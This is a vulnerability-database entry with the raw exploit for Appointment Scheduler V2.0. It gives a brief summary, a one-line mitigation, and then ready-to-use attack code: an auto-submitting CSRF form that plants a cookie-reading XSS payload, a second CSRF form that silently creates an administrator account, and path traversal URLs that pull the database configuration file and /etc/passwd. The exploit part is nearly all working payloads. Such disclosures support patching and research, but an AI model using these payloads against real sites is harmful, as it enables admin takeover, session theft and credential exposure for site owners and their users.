Appointment Scheduler V2.0 - Multiple Vulnerabilities

vendor:

Appointment Scheduler

by:

HackXBack

8,8

CVSS

HIGH

Cross Site Scripting, Cross Site Request Forgery, Local File disclure

79,352,22

CWE

Product Name: Appointment Scheduler

Affected Version From: V2.0

Affected Version To: V2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:phpjabbers:appointment_scheduler

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Appointment Scheduler V2.0 – Multiple Vulnerabilities

Cross Site Scripting: An attacker can inject malicious JavaScript code into the vulnerable application. Cross Site Request Forgery: An attacker can add an admin user to the application. Local File disclure: An attacker can access sensitive files from the application.

Mitigation:

Implement input validation, use of anti-CSRF tokens, and proper access control.

Source

Exploit-DB raw data:

Appointment Scheduler V2.0 - Multiple Vulnerabilities
=========================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/appointment-scheduler/
####################################################################

===[ Exploit ]===

[1] Cross Site Scripting
=========================

# CSRF with XSS Exploit:


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminServices&action=pjActionCreate">
<input type="hidden" name="service_create" value="1"/>
<input type="hidden" name="i18n[1][name]"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[1][description]" value="Iphobos Blog"/>
<input type="hidden" name="price" value="100"/>
<input type="hidden" name="length" value="1"/>
<input type="hidden" name="before" value="1"/>
<input type="hidden" name="after" value="1"/>
<input type="hidden" name="total" value="3"/>
<input type="hidden" name="is_active" value="1"/>
</form>
</body>
</html>


[2] Cross Site Request Forgery
===============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="name" value="Iphobos"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html

[3] Local File disclure
========================

http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../app/config/db.inc.php
http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd


####################################################################